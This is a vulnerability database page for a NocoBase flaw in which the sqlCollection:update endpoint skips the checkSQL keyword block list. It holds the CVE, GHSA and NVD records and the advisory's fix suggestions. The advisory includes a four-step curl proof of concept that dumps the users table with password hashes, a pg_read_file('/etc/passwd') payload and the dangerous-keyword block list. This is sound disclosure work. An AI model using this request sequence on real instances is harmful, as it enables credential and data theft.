Vulnerability-Lookup

CVE-2026-41641 (GCVE-0-2026-41641)

Vulnerability from cvelistv5 – Published: 2026-05-07 04:13 – Updated: 2026-05-07 14:14

Title

NocoBase Vulnerable to SQL Validation Bypass via `sqlCollection:update` Missing `checkSQL` Call

Summary

NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39.

Severity ?

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-284 - Improper Access Control

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nocobase/nocobase/security/adv…	x_refsource_CONFIRM
	https://github.com/nocobase/nocobase/pull/9134	x_refsource_MISC
	https://github.com/nocobase/nocobase/commit/851ae…	x_refsource_MISC
	https://github.com/nocobase/nocobase/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nocobase	nocobase	Affected: < 2.0.39

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41641",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-07T14:13:49.780425Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-07T14:14:23.539Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nocobase",
          "vendor": "nocobase",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.0.39"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-07T04:13:33.609Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh"
        },
        {
          "name": "https://github.com/nocobase/nocobase/pull/9134",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nocobase/nocobase/pull/9134"
        },
        {
          "name": "https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91"
        },
        {
          "name": "https://github.com/nocobase/nocobase/releases/tag/v2.0.39",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nocobase/nocobase/releases/tag/v2.0.39"
        }
      ],
      "source": {
        "advisory": "GHSA-wrwh-c28m-9jjh",
        "discovery": "UNKNOWN"
      },
      "title": "NocoBase Vulnerable to SQL Validation Bypass via `sqlCollection:update` Missing `checkSQL` Call"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41641",
    "datePublished": "2026-05-07T04:13:33.609Z",
    "dateReserved": "2026-04-21T23:58:43.801Z",
    "dateUpdated": "2026-05-07T14:14:23.539Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41641",
      "date": "2026-05-08",
      "epss": "0.00095",
      "percentile": "0.26152"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41641\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-07T06:16:05.073\",\"lastModified\":\"2026-05-07T20:23:22.440\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"},{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nocobase:nocobase:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0.39\",\"matchCriteriaId\":\"353FCC5B-0DF7-49FC-9E2B-FD04C3A46751\"}]}]}],\"references\":[{\"url\":\"https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nocobase/nocobase/pull/9134\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/nocobase/nocobase/releases/tag/v2.0.39\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41641\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-07T14:13:49.780425Z\"}}}], \"references\": [{\"url\": \"https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-07T14:14:17.766Z\"}}], \"cna\": {\"title\": \"NocoBase Vulnerable to SQL Validation Bypass via `sqlCollection:update` Missing `checkSQL` Call\", \"source\": {\"advisory\": \"GHSA-wrwh-c28m-9jjh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nocobase\", \"product\": \"nocobase\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.0.39\"}]}], \"references\": [{\"url\": \"https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh\", \"name\": \"https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nocobase/nocobase/pull/9134\", \"name\": \"https://github.com/nocobase/nocobase/pull/9134\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91\", \"name\": \"https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nocobase/nocobase/releases/tag/v2.0.39\", \"name\": \"https://github.com/nocobase/nocobase/releases/tag/v2.0.39\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-07T04:13:33.609Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41641\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-07T14:14:23.539Z\", \"dateReserved\": \"2026-04-21T23:58:43.801Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-07T04:13:33.609Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-WRWH-C28M-9JJH

Vulnerability from github – Published: 2026-04-22 20:07 – Updated: 2026-04-22 20:07

Summary

@nocobase/plugin-collection-sql: SQL Validation Bypass Through Missing `checkSQL` Call

Details

Summary

The checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data.

Affected component: @nocobase/plugin-collection-sql Affected versions: <= 2.0.32 (confirmed) Minimum privilege: Collection management permissions (pm.data-source-manager.collection-sql snippet)

Vulnerable Code

`checkSQL` is applied on create and execute

packages/plugins/@nocobase/plugin-collection-sql/src/server/resources/sql.ts

// Line 51-60 — execute action: checkSQL IS called
execute: async (ctx: Context, next: Next) => {
    const { sql } = ctx.action.params.values || {};
    try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); }
    // ...
}

`checkSQL` is NOT applied on update

// Line 105-118 — update action: checkSQL IS NOT called
update: async (ctx: Context, next: Next) => {
    const transaction = await ctx.app.db.sequelize.transaction();
    try {
        const { upRes } = await updateCollection(ctx, transaction);
        // No checkSQL() call anywhere in this path!
        const [collection] = upRes;
        await collection.load({ transaction, resetFields: true });
        await transaction.commit();
    }
    // ...
}

The `checkSQL` function itself

packages/plugins/@nocobase/plugin-collection-sql/src/server/utils.ts:10-28

export const checkSQL = (sql: string) => {
  const dangerKeywords = [
    'pg_read_file', 'pg_write_file', 'pg_ls_dir', 'LOAD_FILE',
    'INTO OUTFILE', 'INTO DUMPFILE', 'dblink', 'lo_import', // ...
  ];
  sql = sql.trim().split(';').shift();
  if (!/^select/i.test(sql) && !/^with([\s\S]+)select([\s\S]+)/i.test(sql)) {
    throw new Error('Only supports SELECT statements or WITH clauses');
  }
  if (dangerKeywords.some((keyword) => sql.toLowerCase().includes(keyword.toLowerCase()))) {
    throw new Error('SQL statements contain dangerous keywords');
  }
};

PoC

TOKEN="<admin_jwt_token>"

# Step 1: Create collection with valid SQL (passes checkSQL)
curl -s http://TARGET:13000/api/collections:create \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "exfil_collection",
    "sql": "SELECT 1 as id",
    "fields": [{"name": "id", "type": "integer"}],
    "template": "sql"
  }'

# Step 2: Verify checkSQL blocks dangerous SQL on create
curl -s http://TARGET:13000/api/collections:create \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "blocked", "sql": "SELECT pg_read_file('\''/etc/passwd'\'')", "fields": [], "template": "sql"}'
# Returns: 400 "SQL statements contain dangerous keywords"

# Step 3: Update with dangerous SQL — bypasses checkSQL entirely
curl -s "http://TARGET:13000/api/sqlCollection:update?filterByTk=exfil_collection" \
  -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "sql": "SELECT * FROM users",
    "fields": [
      {"name": "id", "type": "integer"},
      {"name": "email", "type": "string"},
      {"name": "password", "type": "string"}
    ]
  }'
# Returns: 200 OK — no validation!

# Step 4: Query the collection to exfiltrate data
curl -s "http://TARGET:13000/api/exfil_collection:list" \
  -H "Authorization: Bearer $TOKEN"
# Returns: all rows from users table including password hashes

Impact

Confidentiality: Arbitrary SELECT queries exfiltrate any table. Confirmed dump of the users table including password hashes.
Integrity/Availability: Although checkSQL strips after the first semicolon, dangerous single-statement operations like SELECT ... INTO, subqueries with side effects, or database-specific functions (pg_read_file, LOAD_FILE, dblink) are all accessible through the update bypass.
Privilege escalation: On PostgreSQL, dblink enables lateral movement to other databases. pg_read_file reads arbitrary files from the database server filesystem.

Fix Suggestion

Add checkSQL() to the update action. The one-line fix: javascript update: async (ctx: Context, next: Next) => { const { sql } = ctx.action.params.values || {}; if (sql) { try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); } } // ... existing code ... }
Centralize validation in middleware rather than per-action. Apply checkSQL in the resource middleware for any action that accepts a sql field, so future actions cannot accidentally skip it.
Strengthen the blocklist. The current list is missing COPY (PostgreSQL file I/O and RCE), CREATE, ALTER, DROP, GRANT, SET, and EXECUTE. Consider switching to a parser-based allowlist that only permits SELECT and WITH ... SELECT at the AST level rather than relying on keyword blocklisting.

Severity ?

7.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nocobase/plugin-collection-sql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.39"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41641"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T20:07:11Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `checkSQL()` validation function that blocks dangerous SQL keywords (e.g., `pg_read_file`, `LOAD_FILE`, `dblink`) is applied on the `collections:create` and `sqlCollection:execute` endpoints but is entirely missing on the `sqlCollection:update` endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data.\n\n**Affected component:** `@nocobase/plugin-collection-sql`\n**Affected versions:** \u003c= 2.0.32 (confirmed)\n**Minimum privilege:** Collection management permissions (`pm.data-source-manager.collection-sql` snippet)\n\n## Vulnerable Code\n\n### `checkSQL` is applied on create and execute\n\n`packages/plugins/@nocobase/plugin-collection-sql/src/server/resources/sql.ts`\n\n```javascript\n// Line 51-60 \u2014 execute action: checkSQL IS called\nexecute: async (ctx: Context, next: Next) =\u003e {\n    const { sql } = ctx.action.params.values || {};\n    try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); }\n    // ...\n}\n```\n\n### `checkSQL` is NOT applied on update\n\n```javascript\n// Line 105-118 \u2014 update action: checkSQL IS NOT called\nupdate: async (ctx: Context, next: Next) =\u003e {\n    const transaction = await ctx.app.db.sequelize.transaction();\n    try {\n        const { upRes } = await updateCollection(ctx, transaction);\n        // No checkSQL() call anywhere in this path!\n        const [collection] = upRes;\n        await collection.load({ transaction, resetFields: true });\n        await transaction.commit();\n    }\n    // ...\n}\n```\n\n### The `checkSQL` function itself\n\n`packages/plugins/@nocobase/plugin-collection-sql/src/server/utils.ts:10-28`\n\n```javascript\nexport const checkSQL = (sql: string) =\u003e {\n  const dangerKeywords = [\n    \u0027pg_read_file\u0027, \u0027pg_write_file\u0027, \u0027pg_ls_dir\u0027, \u0027LOAD_FILE\u0027,\n    \u0027INTO OUTFILE\u0027, \u0027INTO DUMPFILE\u0027, \u0027dblink\u0027, \u0027lo_import\u0027, // ...\n  ];\n  sql = sql.trim().split(\u0027;\u0027).shift();\n  if (!/^select/i.test(sql) \u0026\u0026 !/^with([\\s\\S]+)select([\\s\\S]+)/i.test(sql)) {\n    throw new Error(\u0027Only supports SELECT statements or WITH clauses\u0027);\n  }\n  if (dangerKeywords.some((keyword) =\u003e sql.toLowerCase().includes(keyword.toLowerCase()))) {\n    throw new Error(\u0027SQL statements contain dangerous keywords\u0027);\n  }\n};\n```\n\n## PoC\n\n```bash\nTOKEN=\"\u003cadmin_jwt_token\u003e\"\n\n# Step 1: Create collection with valid SQL (passes checkSQL)\ncurl -s http://TARGET:13000/api/collections:create \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"name\": \"exfil_collection\",\n    \"sql\": \"SELECT 1 as id\",\n    \"fields\": [{\"name\": \"id\", \"type\": \"integer\"}],\n    \"template\": \"sql\"\n  }\u0027\n\n# Step 2: Verify checkSQL blocks dangerous SQL on create\ncurl -s http://TARGET:13000/api/collections:create \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\": \"blocked\", \"sql\": \"SELECT pg_read_file(\u0027\\\u0027\u0027/etc/passwd\u0027\\\u0027\u0027)\", \"fields\": [], \"template\": \"sql\"}\u0027\n# Returns: 400 \"SQL statements contain dangerous keywords\"\n\n# Step 3: Update with dangerous SQL \u2014 bypasses checkSQL entirely\ncurl -s \"http://TARGET:13000/api/sqlCollection:update?filterByTk=exfil_collection\" \\\n  -X POST \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"sql\": \"SELECT * FROM users\",\n    \"fields\": [\n      {\"name\": \"id\", \"type\": \"integer\"},\n      {\"name\": \"email\", \"type\": \"string\"},\n      {\"name\": \"password\", \"type\": \"string\"}\n    ]\n  }\u0027\n# Returns: 200 OK \u2014 no validation!\n\n# Step 4: Query the collection to exfiltrate data\ncurl -s \"http://TARGET:13000/api/exfil_collection:list\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Returns: all rows from users table including password hashes\n```\n\n## Impact\n\n- **Confidentiality:** Arbitrary `SELECT` queries exfiltrate any table. Confirmed dump of the `users` table including password hashes.\n- **Integrity/Availability:** Although `checkSQL` strips after the first semicolon, dangerous single-statement operations like `SELECT ... INTO`, subqueries with side effects, or database-specific functions (`pg_read_file`, `LOAD_FILE`, `dblink`) are all accessible through the update bypass.\n- **Privilege escalation:** On PostgreSQL, `dblink` enables lateral movement to other databases. `pg_read_file` reads arbitrary files from the database server filesystem.\n\n## Fix Suggestion\n\n1. **Add `checkSQL()` to the `update` action.** The one-line fix:\n   ```javascript\n   update: async (ctx: Context, next: Next) =\u003e {\n       const { sql } = ctx.action.params.values || {};\n       if (sql) {\n           try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); }\n       }\n       // ... existing code ...\n   }\n   ```\n\n2. **Centralize validation in middleware** rather than per-action. Apply `checkSQL` in the resource middleware for any action that accepts a `sql` field, so future actions cannot accidentally skip it.\n\n3. **Strengthen the blocklist.** The current list is missing `COPY` (PostgreSQL file I/O and RCE), `CREATE`, `ALTER`, `DROP`, `GRANT`, `SET`, and `EXECUTE`. Consider switching to a parser-based allowlist that only permits `SELECT` and `WITH ... SELECT` at the AST level rather than relying on keyword blocklisting.",
  "id": "GHSA-wrwh-c28m-9jjh",
  "modified": "2026-04-22T20:07:11Z",
  "published": "2026-04-22T20:07:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/pull/9134"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nocobase/nocobase"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@nocobase/plugin-collection-sql: SQL Validation Bypass Through Missing `checkSQL` Call"
}

FKIE_CVE-2026-41641

Vulnerability from fkie_nvd - Published: 2026-05-07 06:16 - Updated: 2026-05-07 20:23

Severity ?

7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91	Patch
security-advisories@github.com	https://github.com/nocobase/nocobase/pull/9134	Issue Tracking, Patch
security-advisories@github.com	https://github.com/nocobase/nocobase/releases/tag/v2.0.39	Patch, Product
security-advisories@github.com	https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nocobase	nocobase	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nocobase:nocobase:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "353FCC5B-0DF7-49FC-9E2B-FD04C3A46751",
              "versionEndExcluding": "2.0.39",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39."
    }
  ],
  "id": "CVE-2026-41641",
  "lastModified": "2026-05-07T20:23:22.440",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-07T06:16:05.073",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/nocobase/nocobase/pull/9134"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://github.com/nocobase/nocobase/releases/tag/v2.0.39"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        },
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41641 (GCVE-0-2026-41641)

GHSA-WRWH-C28M-9JJH

Summary

Vulnerable Code

checkSQL is applied on create and execute

checkSQL is NOT applied on update

The checkSQL function itself

PoC

Impact

Fix Suggestion

FKIE_CVE-2026-41641

Tags

Sightings

Nomenclature

`checkSQL` is applied on create and execute

`checkSQL` is NOT applied on update

The `checkSQL` function itself